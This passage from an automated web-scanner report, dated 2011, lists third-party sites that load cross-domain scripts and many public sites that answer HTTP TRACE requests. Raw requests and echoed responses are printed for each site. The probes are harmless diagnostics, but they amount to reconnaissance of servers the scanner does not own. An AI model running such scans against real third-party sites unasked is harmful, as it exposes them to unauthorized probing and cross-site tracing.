Host:   http://www.usajobs.gov
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usajobs.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10861
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSCBQRCBB=MGJGMMNCLOGHNJBKECBCECPF; path=/
Date: Sat, 02 Apr 2011 13:35:33 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-US" dir="ltr">
<head>
<title>USAJOBS - Page Not Found</title>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
<!-- foreseeresults poll scripts -->
<script type="text/javascript" src="http://media.newjobs.com/id/mgs/2192/cc/foresee/browse/foresee-trigger.js"></script>
...[SNIP]...
</script>
<script src="http://media.newjobs.com/js/wt/dcsi4u0zt00000g4ea6le2s1o_8k6u.js" type="text/javascript"></script>
...[SNIP]...

20.43. http://www.videobash.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.videobash.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videobash.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:08 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: is_really_pc=1; expires=Sun, 03-Apr-2011 13:34:08 GMT
Set-Cookie: vbvisit=1; path=/
Connection: close
Content-Type: text/html
Set-Cookie: RNLBSERVERID=ded543; path=/
Content-Length: 37609

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   <head>
       <meta prop
...[SNIP]...
</title>    
       <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
       <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.44. http://www.websitealive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.websitealive.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.websitealive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9592
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDCSBSCDBC=MAKNBCJDCBAEBCFJJAGGECIK; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:23 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/
...[SNIP]...
</script>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

20.45. http://www.wellness.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellness.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wellness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:33:48 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
Content-Length: 50558
Content-Type: text/html
Cache-Control: private
Set-Cookie: WWFLV=LV=2011%2D4%2D2+6%3A33%3A48; expires=Mon, 02-Apr-2012 13:33:48 GMT; path=/
Set-Cookie: ASPSESSIONIDACQCTCRD=BJAKHBHDIHGAFFDGECCKGLMB; path=/
X-Cache: MISS from squid1.earnware.corp
X-Cache-Lookup: MISS from squid1.earnware.corp:80
Via: 1.0 wellness.com, 1.0 squid1.earnware.corp (squid)
Connection: close

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>The pursuit of health and happiness - 404 Not Foun
...[SNIP]...
<input type="submit" class="greenbutton pad" value="Search" border="0" onClick="document.getElementById('q').value = document.getElementById('q_base').value"><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007762231624042944498:1bib2y4plko"></script>
...[SNIP]...
<div class="leftcolumn">
                           <script type="text/javascript" src="http://c0669102.cdn.cloudfiles.rackspacecloud.com/tabcontent.js">
           /***********************************************
           * Tab Content script v2.2- . Dynamic Drive DHTML code library (www.dynamicdrive.com)
           * This notice MUST stay intact for legal use
           * Vis
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<input type="submit" value="Search" name="sa" alt="" border="0" class="greenbutton" />
                   <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007762231624042944498:1bib2y4plko"></script>
...[SNIP]...
</div>

<script src="http://www.google.com/jsapi"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.46. http://www.whitepages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitepages.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whitepages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 12:38:12 GMT
Status: 200 OK
X-Runtime: 0.02908
ETag: "509dbed9826a8b82280d864c43c645da"
Connection: keep-alive
Set-Cookie: search_beta_test_110331=1; domain=.whitepages.com; path=/; expires=Mon, 02 Apr 2012 12:38:12 GMT
Set-Cookie: wp_endemic_provider=C; domain=.whitepages.com; path=/; expires=Sun, 03 Apr 2011 00:38:12 GMT
Set-Cookie: wp_perm=pid%3DEokXfl0mEeCcYwAfKWTiIA; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:12 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:12 GMT
Set-Cookie: _wpn_sid=dc1ba6490e45f104f1df0d2749bceada; domain=.whitepages.com; path=/
Content-Length: 20020

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Free Peo
...[SNIP]...
</p>


<script src="http://js.revsci.net/gateway/gw.js?csid=A06546" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://pixel.quantserve.com/api/segments.json?a=p-13CZptiqAcX_w&amp;callback=whitepages.vendor.quantast_demographics_callback" type="text/javascript"></script>
...[SNIP]...

20.47. http://www.xbox.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xbox.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xbox.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:20 GMT
Content-Length: 11729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><!--
v 11.3.0051.2
s NnGQg20QFW+VgUopOqzJAQ==
r e3406941-9803-47dc-bab7-3163d61e31e5
-->
<script type="text/javascript" src="http://ajax.aspnetcdn.com/ajax/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...

20.48. http://www.yallwire.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yallwire.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yallwire.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:51 GMT
Server: Apache/2.2.16 (Unix)
Set-Cookie: USERID=-1; expires=Fri, 23-Mar-2012 13:40:51 GMT; path=/; domain=.yallwire.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 15649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type='text/javascript' src='http://www2.music-tags.com/tagengine/www/delivery/spcjs.php?id=30'></script>
...[SNIP]...
<div class="ad_728" id="ad_728_2" style="display:none"><script src="http://view.atdmt.com/AST/jview/171337918/direct;vt.1/01?buster_url=&pub_view_url=&click=" type="text/javascript" language="JavaScript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js">
</script>
...[SNIP]...

21. TRACE method is enabled
There are 278 instances of this issue:


21.1. http://smp.adviva.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smp.adviva.net
Path:   /

Request

TRACE / HTTP/1.0
Host: smp.adviva.net
Cookie: 9aabfc172e1eba65

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:09 GMT
Server: Apache/2.2.11 (Unix) mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: smp.adviva.net
Cookie: 9aabfc172e1eba65


21.2. http://www.110mb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.110mb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.110mb.com
Cookie: be8821eef3864b20

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:29:15 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.110mb.com
Cookie: be8821eef3864b20


21.3. http://www.123greetings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.123greetings.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.123greetings.com
Cookie: cb1a7551a7cb1c7b

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sat, 02 Apr 2011 13:33:21 GMT
Content-Type: message/http
Content-Length: 184
Expires: Sat, 02 Apr 2011 13:33:21 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.123greetings.com
Cookie: cb1a7551a7cb1c7b
X-Forwarded-For: 173.193.214.243
_FP_X_URL: http://www.123greetings.com/
Accept-Encoding: identity;q=0.001


21.4. http://www.2wire.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2wire.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.2wire.net
Cookie: eff44b07532193e8

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:23:38 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http
Set-Cookie: TwoWireLB=3234149130.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.2wire.net
Cookie: eff44b07532193e8


21.5. http://www.4chan.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4chan.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.4chan.org
Cookie: ee4fe4d5a12621b1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:11 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.4chan.org
Cookie: ee4fe4d5a12621b1


21.6. http://www.about.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.about.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.about.com
Cookie: c612f15f0c06cab6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:24 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
CIPA: 173.193.214.243
Connection: Keep-Alive
Cookie: c612f15f0c06cab6
Host: www.about.com


21.7. http://www.aceshowbiz.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aceshowbiz.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aceshowbiz.com
Cookie: c562985f537f5958

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aceshowbiz.com
Cookie: c562985f537f5958


21.8. http://www.ad4game.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ad4game.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ad4game.com
Cookie: 50d7464d27ea5cb2

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:38 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ad4game.com
Cookie: 50d7464d27ea5cb2


21.9. http://www.adfunky.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfunky.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.adfunky.com
Cookie: 9803b409bae59d19

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.adfunky.com
Cookie: 9803b409bae59d19


21.10. http://www.adriver.ru/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adriver.ru
Path:   /

Request

TRACE / HTTP/1.0
Host: www.adriver.ru
Cookie: f23cdfb932761613

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:32 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.adriver.ru
Cookie: f23cdfb932761613


21.11. http://www.allbusiness.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.allbusiness.com
Cookie: 72e420995d859a15

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:41 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.allbusiness.com
Cookie: 72e420995d859a15
X-Forwarded-For: 173.193.214.243


21.12. http://www.allmenus.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allmenus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.allmenus.com
Cookie: 31e5ac33e1bce26d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:09 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.allmenus.com
Cookie: 31e5ac33e1bce26d


21.13. http://www.allvoices.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.allvoices.com
Cookie: e5ff592639190a5d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:32 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.allvoices.com
Cookie: e5ff592639190a5d


21.14. http://www.alphadictionary.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alphadictionary.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.alphadictionary.com
Cookie: 5a3c9df35d057f26

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:34 GMT
Server: Apache/2.0.46 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.alphadictionary.com
Cookie: 5a3c9df35d057f26


21.15. http://www.amerisave.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amerisave.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.amerisave.com
Cookie: 74b02beb4eb7e82d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:35 GMT
Server: Apache/2.2.15 (Win64) mod_ssl/2.2.15 OpenSSL/0.9.8m JRun/4.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.amerisave.com
Cookie: 74b02beb4eb7e82d
X-Forwarded-For: 173.193.214.243
Front-End-Https: OFF


21.16. http://www.andiesisle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.andiesisle.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.andiesisle.com
Cookie: 13f9715918ff72c4

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:11 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.16 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 13f9715918ff72c4
Host: www.andiesisle.com


21.17. http://www.answerbag.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerbag.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.answerbag.com
Cookie: d57457d4aff16ee0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:08 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8d PHP/5.2.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.answerbag.com
Cookie: d57457d4aff16ee0


21.18. http://www.aolnews.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aolnews.com
Cookie: b2058eaf288ca47a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:20 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aolnews.com
Cookie: b2058eaf288ca47a
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:25:52D2:200483,x-lb-client-ip:ajg_u


21.19. http://www.apartmenthomeliving.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmenthomeliving.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.apartmenthomeliving.com
Cookie: f579456d50d50e78

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:33 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Connection: close

TRACE /find HTTP/1.0
Host: www.apartmenthomeliving.com
Cookie: f579456d50d50e78
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.apartmenthomeliving.com
X-Forwarded-Server: www.apartmenthomeliving.com


21.20. http://www.apartmentratings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmentratings.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.apartmentratings.com
Cookie: 4b3f1dbf0683324c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:42 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerapt-www_POOL=1189351596.0.0000; path=/

TRACE / HTTP/1.0
Host: www.apartmentratings.com
Cookie: 4b3f1dbf0683324c
Connection: Keep-Alive


21.21. http://www.apples4theteacher.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apples4theteacher.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.apples4theteacher.com
Cookie: 85753ade9a6c8f4a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.apples4theteacher.com
Cookie: 85753ade9a6c8f4a


21.22. http://www.articlesbase.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.articlesbase.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.articlesbase.com
Cookie: 123bbe8ea5326842

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:47 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.articlesbase.com
Cookie: 123bbe8ea5326842
X-Forwarded-For: 173.193.214.243


21.23. http://www.autotrader.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.autotrader.com
Cookie: 782192d1428e84d7

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:48 GMT
Server: Apache
Set-Cookie: v1st=A50336DC33AC2068; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerAT-Production_hhtp=360015370.61475.0000; path=/

TRACE / HTTP/1.0
Host: www.autotrader.com
Cookie: 782192d1428e84d7
atc_ssl: false


21.24. http://www.barackobama.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barackobama.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.barackobama.com
Cookie: d5eb7991e5d2f6e1

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sat, 02 Apr 2011 13:41:56 GMT
Content-Type: message/http
Content-Length: 113
Expires: Sat, 02 Apr 2011 13:41:56 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.barackobama.com
Cookie: d5eb7991e5d2f6e1
_FP_X_URL: http://www.barackobama.com/


21.25. http://www.beezid.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beezid.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.beezid.com
Cookie: c1dc27bddff39e69

Response

HTTP/1.1 200 OK
Content-Type: message/http
Content-Length: 124
Server: Apache
Date: Sat, 02 Apr 2011 14:02:48 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.beezid.com
Cookie: c1dc27bddff39e69
X-Varnish: 333756357
X-Forwarded-For: 173.193.214.243


21.26. http://www.bible.cc/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bible.cc
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bible.cc
Cookie: 6be7ef3a33fc4d32

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bible.cc
Cookie: 6be7ef3a33fc4d32


21.27. http://www.biglots.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.biglots.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.biglots.com
Cookie: 88cca9fb01c07157

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:57 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.15 OpenSSL/0.9.8o mod_jk/1.2.31
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.biglots.com
Cookie: 88cca9fb01c07157


21.28. http://www.blackberry.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.blackberry.com
Cookie: a5ac1bc713b44eb6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:46 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.blackberry.com
Cookie: a5ac1bc713b44eb6


21.29. http://www.blackplanet.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackplanet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.blackplanet.com
Cookie: efd7a1581a00b94

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.blackplanet.com
Cookie: efd7a1581a00b94
Connection: Keep-Alive
Remote-Address: 173.193.214.243


21.30. http://www.blastro.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blastro.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.blastro.com
Cookie: a426e0305adabf4f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:24 GMT
Server: Apache/2.2.16 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.blastro.com
Cookie: a426e0305adabf4f


21.31. http://www.blogs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.blogs.com
Cookie: a6ebee76ed4047d0

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 14:07:11 GMT
Server: Apache
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.blogs.com
Cookie: a6ebee76ed4047d0
X-Forwarded-For: 173.193.214.243, 10.17.141.102
Connection: keep-alive


21.32. http://www.bluemountain.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluemountain.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bluemountain.com
Cookie: 2e93fe007038e44e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:38 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bluemountain.com
Cookie: 2e93fe007038e44e
X-Forwarded-For: 173.193.214.243


21.33. http://www.blurtit.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.blurtit.com
Cookie: 57028575ff2e8118

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:13 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.blurtit.com
Cookie: 57028575ff2e8118


21.34. http://www.breitbart.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.breitbart.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.breitbart.com
Cookie: 1d6a575c65a8632b

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:46:12 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
X-Cache: MISS from ch-sv-bb3.ha-hosting.com
Connection: close

TRACE / HTTP/1.0
Host: www.breitbart.com
Cookie: 1d6a575c65a8632b
Via: 1.0 ch-sv-bb3.ha-hosting.com:80 (squid/2.5.STABLE14)
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=3600
Connection: keep-alive


21.35. http://www.btradv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.btradv.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.btradv.com
Cookie: 5af4e50bfb16fbe5

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.btradv.com
Cookie: 5af4e50bfb16fbe5


21.36. http://www.buzzfeed.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzzfeed.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.buzzfeed.com
Cookie: 107720d6e49e93dc

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:12 GMT
Server: Apache
Connection: close
Content-Type: message/http

